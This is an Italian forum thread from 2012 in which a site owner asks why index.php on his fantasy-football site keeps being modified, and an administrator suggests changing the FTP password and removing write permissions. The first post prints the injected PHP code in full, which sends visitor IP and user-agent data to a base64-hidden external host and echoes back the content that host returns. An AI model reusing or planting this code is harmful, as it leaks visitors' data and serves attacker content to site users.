Tutti gli orari sono UTC + 1 ora [ ora legale ]




Apri un nuovo argomento Rispondi all’argomento  [ 9 messaggi ] 
Autore Messaggio
 Oggetto del messaggio: continue intrusioni nel sito.
MessaggioInviato: 15/03/2012, 18:37 
So cos'è!
So cos'è!

Iscritto il: 08/10/2011, 10:50
Messaggi: 10
Ciao a tutti.
Non so se è mai capitato anche a voi, ma a me ultimamente sta snervando.
Il problema è questo.. carico il sito correttamente, funziona.. ma poi di punto in bianco cerco di accedere e mi propina schermata bianca. Per correggere di solito mi basta sovrascrivere il file index.php, ma altre volte devo ricaricare tutto.
Aprendo il file ho visto che si piazza del codice che non dovrebbe esserci in fondo al file (allego sotto). Non capisco se è un problema solo mio o succede a qualcun'altro. Come posso risolvere? Premetto che non ci faccio nulla, ho caricato il sito ad inizio campionato, fatto gli aggiornamenti correttamente e carico con FTP SOLO i file dei risultati in JS.
Grazie a tutti,
Rayz

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 15/03/2012, 18:39 
Io so!
Io so!
Avatar utente

Iscritto il: 29/09/2010, 17:44
Messaggi: 685
Località: Castelnuovo della Daunia (FG)
Prova a cambiare passwrod per l'accesso FTP!

_________________
Immagine

http://fantascalzi.fmsrevo.it


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 15/03/2012, 18:49 
So cos'è!
So cos'è!

Iscritto il: 08/10/2011, 10:50
Messaggi: 10
Faccio una prova, nel caso mi faccio risentire.

Grazie mille intanto.
Rayz


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 15/03/2012, 18:56 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
Rayz ha scritto:
Faccio una prova, nel caso mi faccio risentire.

Grazie mille intanto.
Rayz


Indirizzo del sito?
Da quanto te lo fa? Dalla prima volta che l'hai installato? Solo recentemente?
Che host è?

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 15/03/2012, 19:32 
So cos'è!
So cos'è!

Iscritto il: 08/10/2011, 10:50
Messaggi: 10
Rayzxiii.altervista.org
Me lo fa calcola dai primi di gennaio...di punto in bianco!


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 15/03/2012, 19:59 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
Rayz ha scritto:
Rayzxiii.altervista.org
Me lo fa calcola dai primi di gennaio...di punto in bianco!


Ma che permessi di scrittura hanno i file nella tua root?

Devono essere 664.

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 26/03/2012, 19:15 
So cos'è!
So cos'è!

Iscritto il: 08/10/2011, 10:50
Messaggi: 10
come faccio a vederlo?

Ho cambiato password (una complessa) per l'accesso al sito (ftp) xò non è cambiato nulla...spam anche oggi.

Rayz


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 27/03/2012, 8:58 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
Rayz ha scritto:
come faccio a vederlo?

Ho cambiato password (una complessa) per l'accesso al sito (ftp) xò non è cambiato nulla...spam anche oggi.

Rayz


C'è un altro metodo...

Togli tutti i permessi di scrittura ai file nella root.
Vai con filezilla, selezioni i files della root e con il tasto destro, proprietà, togli tutte le spunte dalle cartelle "scrittura".

L'unico inconveniente di questo metodo è che, il giorno che vorrai aggiornare revo, dovrai riassegnare i permessi attuali altrimenti l'aggiornamento non funzionerà.

Mi spiace ma se non sappiamo da che parte entrano per spammare non possiamo rimediare.

P.s.: Considera che a me è successo più volte su cms wordpress... per cui se passano "attraverso" lo sviluppatissiomo e collaudatissimo Wordpress....

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.


Top
Non connesso Profilo  
 
 Oggetto del messaggio: Re: continue intrusioni nel sito.
MessaggioInviato: 27/03/2012, 10:30 
So cos'è!
So cos'è!

Iscritto il: 08/10/2011, 10:50
Messaggi: 10
Ti ringrazio molto. L'inconveniente dell'aggiornamento è minimo dai, mi basta non dover ogni 3 giorni andare li e verificare che il sito non abbia "cose" che partono in java ed installano spyware, e riuppare i file puliti. :D

Ho tolto i parametri di scrittura sul file INDEX.PHP visto che mi entrano sempre e solo sul principale (SPY del cavolo :evil: :evil: :evil: )... male che vada, se mi modificano altre pagine del sito, cambio i parametri anche sugli altri file.

Grazie ancora.
Rayz ;)


Top
Non connesso Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  [ 9 messaggi ] 

Tutti gli orari sono UTC + 1 ora [ ora legale ]


Chi c’è in linea

Visitano il forum: Nessuno e 20 ospiti


Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi

Cerca per:
Vai a:  
cron
Powered by phpBB® Forum Software © phpBB Group
Theme created StylerBB.net & kodeki
Traduzione Italiana phpBBItalia.net basata su phpBB.it 2010